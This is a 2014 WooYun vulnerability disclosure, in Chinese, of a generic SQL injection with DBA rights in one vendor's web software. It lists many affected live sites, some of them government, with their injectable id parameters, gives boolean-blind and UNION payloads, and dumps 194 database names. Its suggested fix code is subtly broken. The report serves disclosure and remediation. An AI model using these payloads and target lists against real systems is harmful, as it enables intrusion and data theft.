当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059986

漏洞标题:某软件公司程序存在通用型(DBA权限)SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-05-09 16:10

修复时间:2014-08-07 16:12

公开时间:2014-08-07 16:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-12: 厂商已经确认,细节仅向厂商公开
2014-05-15: 细节向第三方安全合作伙伴开放
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-07: 细节向公众公开

简要描述:

RT

详细说明:

谷歌:利梭网络
http://www.xxssfj.gov.cn/
http://www.xxxgtj.gov.cn/
http://www.jhqz.com/
http://www.xxairpull.com/
http://www.sxcompany.cn/
http://www.34455.com.cn/
http://www.riugor.com/
http://www.hnyxyz.com/
http://www.xxzhongcai.com/
http://www.yqdbj.com/
http://www.whwxjx.com/
http://www.xxxiangyi.com/
http://www.jlmgjx.com/
http://www.hnhffy.com/
http://www.36699.cn/
http://www.xxktdq.com/
http://www.xxhtfm.com/
http://www.dbxnp.com/
http://www.xinxi365.cn/
http://www.yangzhushebei.com/
http://www.cxnjzzc.com/
http://www.spyxuesci.asia/
http://www.xhzdjx.com/
注入点是id参数,列表如下:
http://www.xxssfj.gov.cn/Picture_Show.php?id=122
http://www.xxssfj.gov.cn/Info_Show.php?id=1016
http://www.xxssfj.gov.cn/Info_Show.php?ColumnID=14&id=949
http://www.xxairpull.com/cpinfo.php?cpid=467
http://www.xxairpull.com/newsinfo.php?id=87&classid=12
http://www.xxairpull.com/newsinfo.php?id=91
http://www.34455.com.cn/newsinfo.php?id=181&classid=11
http://www.34455.com.cn/cpinfo.php?cpid=476
http://www.34455.com.cn/cp_type.php?smallclassid=96
http://www.34455.com.cn/qyinfo.php?id=31
http://www.riugor.com/newsinfo.php?id=157&classid=11
http://www.riugor.com/cpinfo.php?cpid=451
http://www.riugor.com/news_class.php?classid=11
http://www.riugor.com/english/cpinfo.php?cpid=451
http://www.riugor.com/cp_type.php?smallclassid=98
http://www.xxzhongcai.com/jszcinfo.php?tl_id=31
http://www.xxzhongcai.com/cpinfo.php?product_id=2
http://www.yqdbj.com/newsinfo.php?id=32
... ...

漏洞证明:

http://www.xxssfj.gov.cn/

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1003' AND 4805=4805 AND 'JVIW'='JVIW
    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: id=1003' UNION ALL SELECT CONCAT(0x7165666171,0x69505559437473675171,0x71686b6e71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5
current user is DBA:    True


tables:

available databases [194]:
[*] #mysql50#sanyuan-ygt
[*] #mysql50#shengxin-ygt-303
[*] #mysql50#yuxin-ygt
[*] 334a
[*] 334b
[*] 334c
[*] 34455cn
[*] aipuli
[*] atn
[*] baixingyangzhu
[*] baliao
[*] bdh
[*] beiyong
[*] bolangsha
[*] boshi
[*] cainuan
[*] diyiyiyuan
[*] dongshengjx
[*] dongyuanzds
[*] dstsj
[*] emiao
[*] fanshi
[*] fengshou
[*] gaosheng
[*] gaoyao
[*] gerui2
[*] geruien2
[*] gkzy
[*] gkzyeng
[*] guangrunlbg
[*] guangyuanjianzhu
[*] guifang
[*] guolu
[*] guqiang
[*] haibinyy
[*] haoge
[*] hdjnhb
[*] henanyongxing
[*] hengshengyangzhi
[*] hengxingzs
[*] hnyzsb
[*] hongda
[*] hongdahuagong
[*] hongguang
[*] hongguanyao
[*] hongkai
[*] hongkang
[*] hongyuanzd
[*] hongyuanzhengd
[*] hqshanghui
[*] huadongzhiguana
[*] huangguanjiudian
[*] huatongsj
[*] huaweizx
[*] huazheng
[*] huitong
[*] hysfjx
[*] hysfsb
[*] hyzdd
[*] hyzddj
[*] ido
[*] information_schema
[*] iweila
[*] jiameisy
[*] jianghe
[*] jiangheeng
[*] jingfeng
[*] jingfusp
[*] jingxiaobo
[*] jinjihuagong
[*] jinshun
[*] jinxia
[*] jinxia521
[*] jinzhenjx
[*] jmsy
[*] junfenqu
[*] juzhongzhuangshi
[*] kailily
[*] kangdi
[*] kangfu
[*] kanglinqx
[*] kelida
[*] keruida
[*] kunlun
[*] liancheng
[*] lierguolv
[*] lingyuan
[*] lisuo
[*] lisuoitli
[*] longsheng
[*] longtengsc
[*] lsqy
[*] lurun
[*] mamawang
[*] menzhen
[*] mingrendb
[*] mingtai
[*] mysql
[*] nengyuan
[*] nuandongbwb
[*] odf
[*] opk
[*] oudifei
[*] pulongny
[*] qimei
[*] qizhongji
[*] qudongjinghua
[*] rifeng
[*] rongxin
[*] ruige
[*] ruigecd
[*] ruiliqm
[*] rundongjianzhu
[*] saikugaizhuang
[*] sanchengjx
[*] sanjiusw
[*] sanyang
[*] sanyuan
[*] sanyuantang
[*] shanhe
[*] shengdadianyuan
[*] shengqiming
[*] shengteng
[*] shengxin
[*] shennong
[*] shiqiang
[*] shiqiangjixie
[*] sifangbs
[*] sihaifangfu
[*] ssssssss
[*] tengfeijixie
[*] test
[*] tianruiyeya
[*] tianruiyy
[*] tonghuigm
[*] tongyong
[*] tongzhoujixie
[*] wajueji
[*] wantongfm
[*] webbase
[*] weiliang
[*] woww
[*] xfyjps
[*] xianfeng
[*] xiangsu
[*] xiangyuansp
[*] xianlonggy
[*] xielijx
[*] xincheng
[*] xinfangbb
[*] xinfeiyz
[*] xinhe
[*] xinpujx434
[*] xintiandi
[*] xinxiangguolu188
[*] xkhb
[*] xqpudong
[*] xqyhzxh
[*] xtlwood
[*] xtlwooden
[*] xxbangniwang
[*] xxgerui
[*] xxgeruien
[*] xxguolu
[*] xxhgj
[*] xxkjgs
[*] xxshuibeng
[*] xxssfj
[*] xxyouth
[*] xxyouthbbs
[*] xyb
[*] yahua623
[*] yangzhujidi
[*] ycyzsb
[*] yejin
[*] yimutian
[*] yingda
[*] yingdajx
[*] yingdajxeng
[*] yixiang
[*] yixin
[*] yizhuo
[*] yongxing2013
[*] yongxingyangzhi
[*] yuanhengjx
[*] yuanman
[*] zhendajx
[*] zhengde
[*] zhengshuo
[*] zhongxin
[*] zhongxingsp
[*] zhongyuanlingkong
[*] zhongzhisiliao
[*] zjjf

修复方案:

数字型参数id
修复方案为:在接收参数id时,对其进行强制整型转换即可。
int id= Integer.parseInt("id") ;//对id整型转换后再进行下一步的数据库查询更安全

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-12 18:51

厂商回复:

CNVD确认并复现所述情况,由CNVD通过公开联系渠道向软件生产厂商通报。

最新状态:

暂无